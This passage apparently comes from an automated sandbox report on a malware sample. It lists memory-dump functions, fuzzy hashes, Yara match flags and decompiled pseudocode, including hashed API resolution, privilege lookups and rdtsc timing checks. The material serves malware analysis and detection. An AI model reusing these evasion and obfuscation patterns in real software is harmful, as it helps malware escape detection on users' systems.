Instruction Fuzzy Hash: 7C9002A134141442D10065994815B070009E7E1351F61C015E5054654DC659CC527566

Uniqueness

Uniqueness Score: -1.00%

Function 01619860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161986A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 555be5b8239ab00ded8697dd33bb6379c642f3d53a224c1b4ae54f2dbb8b766a
Instruction ID: e0620d04d4506619789732b27b72753c7a26d2fa5f863ace8a17fd7c4bfdc748
Opcode Fuzzy Hash: 555be5b8239ab00ded8697dd33bb6379c642f3d53a224c1b4ae54f2dbb8b766a
Instruction Fuzzy Hash: E790027130141413D11165994905707000DA7D0291FA1C412E4414658DD6968952B561

Uniqueness

Uniqueness Score: -1.00%

Function 01619840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161984A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e82f1425a3f1d0769a81a3a2beb972acfbe7dee928f785a58b2950bc578c4c0e
Instruction ID: 4cfac8e42e8d3baaf933058fb55f968ee8f83da25c2828dbc780d3af347a409e
Opcode Fuzzy Hash: e82f1425a3f1d0769a81a3a2beb972acfbe7dee928f785a58b2950bc578c4c0e
Instruction Fuzzy Hash: D6900261342451525545B5994805507400AB7E02917A1C012E5404A50CC5669856EA61

Uniqueness

Uniqueness Score: -1.00%

Function 016198F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016198FA

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31dabe32109c09af5b11fe52e71d292c372eb77b3fabdccfafdfc97a8217879c
Instruction ID: 94ba26a7ddb5a7d844c00e98985643fc472871d893decbb3d45e938e801387ed
Opcode Fuzzy Hash: 31dabe32109c09af5b11fe52e71d292c372eb77b3fabdccfafdfc97a8217879c
Instruction Fuzzy Hash: E890026170141502D10175994805617000EA7D0291FA1C022E5014655ECA658992B571

Uniqueness

Uniqueness Score: -1.00%

Function 01619A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619A5A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec5961c3713166976717f80de24f980899b9375fa21faf6abe1acffbcec1d9c0
Instruction ID: 1467d846da8dcd7c5e87a569229924ad85c0eb97272ee8d704f7f908cb9e19c0
Opcode Fuzzy Hash: ec5961c3713166976717f80de24f980899b9375fa21faf6abe1acffbcec1d9c0
Instruction Fuzzy Hash: 18900261311C1042D20069A94C15B070009A7D0353F61C115E4144654CC95588616961

Uniqueness

Uniqueness Score: -1.00%

Function 01619A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619A2A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d3e720a73a2da4fcfedc910f09222a84b8a3a01b2c0393b6afffa8fc8b94d407
Instruction ID: 6d49cb9b2a4baf39679fc3ded791af0972b79db2628636d6720c2295123c16f6
Opcode Fuzzy Hash: d3e720a73a2da4fcfedc910f09222a84b8a3a01b2c0393b6afffa8fc8b94d407
Instruction Fuzzy Hash: 7E90026170141042414075A98C459074009BBE1261761C121E4988650DC59988656AA5

Uniqueness

Uniqueness Score: -1.00%

Function 01619A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619A0A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 972d25b8de16e57a14a8336e38bd8b0397da9097800e7bfb3af316035ca3751d
Instruction ID: f59635d3eda617772590ec5e10fddbe4a50e32daa6a34fae4d8d4703f8351a09
Opcode Fuzzy Hash: 972d25b8de16e57a14a8336e38bd8b0397da9097800e7bfb3af316035ca3751d
Instruction Fuzzy Hash: F790027130181402D10065994C1570B0009A7D0352F61C011E5154655DC665885179B1

Uniqueness

Uniqueness Score: -1.00%

Function 01619540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161954A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e0c234d12383c39a21b93518f7eee6174b4c029affecede4572d9901af64ff7
Instruction ID: f89577b427f6823acac08a3b8de9607d80fb0c52b0dcd70eba54068a01f39c8e
Opcode Fuzzy Hash: 3e0c234d12383c39a21b93518f7eee6174b4c029affecede4572d9901af64ff7
Instruction Fuzzy Hash: 1B900265311410030105A9990B05507004AA7D53A1361C021F5005650CD66188616561

Uniqueness

Uniqueness Score: -1.00%

Function 016195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016195DA

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b257b45f52f0f711cb5745e8be4e9a9c4c0c2308b076541934d7c8604b74c8a
Instruction ID: 07fdf3d03304d58740c0b1340aaa5490d795916f91b5198d6c813294730b2af4
Opcode Fuzzy Hash: 1b257b45f52f0f711cb5745e8be4e9a9c4c0c2308b076541934d7c8604b74c8a
Instruction Fuzzy Hash: AE9002A130241003410575994815617400EA7E0251B61C021E5004690DC56588917565

Uniqueness

Uniqueness Score: -1.00%

Function 01619710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161971A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b7baa83169e2fc271f6bad519a44195530be5d3655263ab75f66ecc62a3a4f0b
Instruction ID: 9e949753b8dbf872f4d88dee18043803981018653c0fb257511aed0788f4aa6a
Opcode Fuzzy Hash: b7baa83169e2fc271f6bad519a44195530be5d3655263ab75f66ecc62a3a4f0b
Instruction Fuzzy Hash: 6090027130141402D10069D958096470009A7E0351F61D011E9014655EC6A588917571

Uniqueness

Uniqueness Score: -1.00%

Function 01619FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619FEA

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9cf9b2c8de49ce4fdb8847485f62940516ddc33303479f84987da0472863ccb4
Instruction ID: 78ebb723a184caac63d9d35361af2437df58621d7bf64d8b2e3bb4ab6e8b15e3
Opcode Fuzzy Hash: 9cf9b2c8de49ce4fdb8847485f62940516ddc33303479f84987da0472863ccb4
Instruction Fuzzy Hash: B290027131155402D110659988057070009A7D1251F61C411E4814658DC6D588917562

Uniqueness

Uniqueness Score: -1.00%

Function 016197A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016197AA

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71fee13e9ffd2e3018ba54c1dbf719dfbc1b06be315b510b79087c0ef8fe8ad8
Instruction ID: 461da8af01f236437aa94dd6af84987abd6dcceed818e79686b445234ac4cf3a
Opcode Fuzzy Hash: 71fee13e9ffd2e3018ba54c1dbf719dfbc1b06be315b510b79087c0ef8fe8ad8
Instruction Fuzzy Hash: DC90026130141003D140759958196074009F7E1351F61D011E4404654CD95588566662

Uniqueness

Uniqueness Score: -1.00%

Function 01619780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161978A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 13c48c6def0e3b305961bdb3d07db927bb0eb4a79cb65c6f2f4ef4d6e13db010
Instruction ID: 89d863556e182fee3a20df9a8937052a30d584eac9e661bcfa222d0f71e3e8bd
Opcode Fuzzy Hash: 13c48c6def0e3b305961bdb3d07db927bb0eb4a79cb65c6f2f4ef4d6e13db010
Instruction Fuzzy Hash: A890026931341002D1807599580960B0009A7D1252FA1D415E4005658CC95588696761

Uniqueness

Uniqueness Score: -1.00%

Function 01619660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161966A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 419b8aefd6fdf9347fe68719dbef0a3aa17e8319f4974c9f825e32960cd64133
Instruction ID: aba2685712c6f6520086a8071a75117ca47b9416760e7925d824455ed21ba36d
Opcode Fuzzy Hash: 419b8aefd6fdf9347fe68719dbef0a3aa17e8319f4974c9f825e32960cd64133
Instruction Fuzzy Hash: C990027130141802D1807599480564B0009A7D1351FA1C015E4015754DCA558A597BE1

Uniqueness

Uniqueness Score: -1.00%

Function 016196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016196EA

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eecbe2aaa73b634eb8c0050dc43fa3c2f7fffb81d8fe378a41c24f2cfa97be89
Instruction ID: d16044c0bcd926f8d5d329fbbb7919e6dabbeb97672751a6da4ebd5ae8143567
Opcode Fuzzy Hash: eecbe2aaa73b634eb8c0050dc43fa3c2f7fffb81d8fe378a41c24f2cfa97be89
Instruction Fuzzy Hash: 0B90027130149802D1106599880574B0009A7D0351F65C411E8414758DC6D588917561

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088B0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088bb
0x004088c3
0x004088c5
0x004088ca
0x004088cf
0x004088e2
0x004088e7
0x004088f0
0x004088fc
0x0040890f
0x00408914
0x00408917
0x00408920
0x00408932
0x00408937
0x0040893c
0x00000000
0x00000000
0x0040893e
0x00408942
0x00000000
0x00000000
0x00408944
0x00000000
0x00408942
0x00408946
0x00408949
0x0040894f
0x00408951
0x0040895c
0x00408961
0x00408964
0x00408971
0x0040897c
0x0040897e
0x00408984
0x00408988
0x0040898b
0x0040898b
0x00408992
0x00408995
0x0040899a
0x004089a7
0x004088d6
0x004088d6
0x004088d6

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 00409B18, Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00409B18(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, void* _a8) {
				void* _v4;
				intOrPtr _v8;
				char* _v12;
				char _v16;
				char _v540;
				void* _t21;
				void* _t23;
				void* _t31;
				void* _t34;

				asm("aad 0x2e");
				asm("sbb [eax], ebp");
				if(__eflags > 0) {
					L5:
					_push(cs);
				} else {
					_push(_t31);
					_t31 = _t34;
					_t26 = _a4;
					_v12 =  &_v540;
					_t21 = E0041AB50( &_v16, 0x104, _a4);
					if(_t21 != 0) {
						_t23 = E0041AF70(_v8, _t26, __eflags, _v8);
						__eflags = _t23;
						if (_t23 == 0) goto L7;
						goto L5;
					} else {
						return _t21;
					}
				}
			}

0x00409b19
0x00409b1b
0x00409b1d
0x00409b5e
0x00409b5e
0x00409b1f
0x00409b20
0x00409b21
0x00409b29
0x00409b3c
0x00409b3f
0x00409b49
0x00409b53
0x00409b5b
0x00409b5d
0x00000000
0x00409b4b
0x00409b4e
0x00409b4e
0x00409b49

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 0320491738ebc954579f3e59615b27c6cdd4cf036a46c4766044c19f316262e4
Instruction ID: 8237bc08cc2131e2b1a3e23b471183f3d5ad50d705d312ce0c6a918c074fd007
Opcode Fuzzy Hash: 0320491738ebc954579f3e59615b27c6cdd4cf036a46c4766044c19f316262e4
Instruction Fuzzy Hash: 1B0171B5D0010DBBDF10EB90EC42FDDB774AB54708F004199E918A7281E635EB48CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004184C3, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004184C3(void* __eax, intOrPtr __ebx, signed int __ecx, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				char _t15;
				void* _t24;

				_pop(ss);
				 *(__ebx - 5) =  *(__ebx - 5) & __ecx;
				 *((intOrPtr*)( *((intOrPtr*)(__ebx)))) = __ebx;
				asm("lodsb");
				asm("in eax, dx");
				_t12 = _a8;
				_t6 = _t12 + 0xc74; // 0xc74
				E00418DC0(_t24, _a8, _t6,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t15 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t15;
			}

0x004184c3
0x004184c4
0x004184c8
0x004184ca
0x004184ce
0x004184d3
0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 38939defacaacc5cbb12973b36de8e4ba3b02af42e81d1f5cdf60714f5a2c726
Instruction ID: 4efdaf914da1a20b0d739c3143d936363cf0e6760468374a78e83e501358b8d6
Opcode Fuzzy Hash: 38939defacaacc5cbb12973b36de8e4ba3b02af42e81d1f5cdf60714f5a2c726
Instruction Fuzzy Hash: 10F0ED712142106BCB25DF64DC88EE77BA8AF99240F044599F94C9B282C630E910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418621(void* __ebx, void* __edi, intOrPtr _a12, WCHAR* _a16, WCHAR* _a20, struct _LUID* _a24) {
				int _t13;

				asm("stc");
				_pop(ds);
				_pop(_t24);
				asm("rcl dword [ebp-0x75], cl");
				_t10 = _a12;
				E00418DC0(0x26e0f26f, _a12, _a12 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a16, _a20, _a24); // executed
				return _t13;
			}

0x00418621
0x00418622
0x00418623
0x0041862f
0x00418633
0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7ba741b99c317733613355d0fa92eb837fdab447081e2398c15fcbcc42b9d0bf
Instruction ID: 92b0b2143685e5c8d12f5af823decbdb4698b21fae67c1c666bdcc3a1e3bf321
Opcode Fuzzy Hash: 7ba741b99c317733613355d0fa92eb837fdab447081e2398c15fcbcc42b9d0bf
Instruction Fuzzy Hash: 87F0E5762003086BCB20CF54DC41EEB7BA8AF44360F018559FD1D67342C631E814CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 0161967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619694

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3979ef137f87ae27ecf184962ab8c32796ee3ee8f99734d31c273164a96012c
Instruction ID: 3a1a3548b4a7b5b9322192fd16d64db6b37d4cc6e10512b96b71d7a2f11d165f
Opcode Fuzzy Hash: f3979ef137f87ae27ecf184962ab8c32796ee3ee8f99734d31c273164a96012c
Instruction Fuzzy Hash: FAB09B719015D5C5E615D7A44E08717790477D1755F26C451D2020751F4778C091F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0168B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0168B53F
The resource is owned shared by %d threads, xrefs: 0168B37E
The resource is owned exclusively by thread %p, xrefs: 0168B374
an invalid address, %p, xrefs: 0168B4CF
*** enter .exr %p for the exception record, xrefs: 0168B4F1
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0168B3D6
*** Inpage error in %ws:%s, xrefs: 0168B418
a NULL pointer, xrefs: 0168B4E0
*** then kb to get the faulting stack, xrefs: 0168B51C
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0168B314
The instruction at %p tried to %s , xrefs: 0168B4B6
*** Resource timeout (%p) in %ws:%s, xrefs: 0168B352
The instruction at %p referenced memory at %p., xrefs: 0168B432
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0168B2DC
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0168B476
*** An Access Violation occurred in %ws:%s, xrefs: 0168B48F
write to, xrefs: 0168B4A6
The critical section is owned by thread %p., xrefs: 0168B3B9
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0168B323
read from, xrefs: 0168B4AD, 0168B4B2
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0168B38F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0168B484
*** enter .cxr %p for the context, xrefs: 0168B50D
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0168B2F3
This failed because of error %Ix., xrefs: 0168B446
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0168B47D
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0168B39B
<unknown>, xrefs: 0168B27E, 0168B2D1, 0168B350, 0168B399, 0168B417, 0168B48E
Go determine why that thread has not released the critical section., xrefs: 0168B3C5
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0168B305

Memory Dump Source

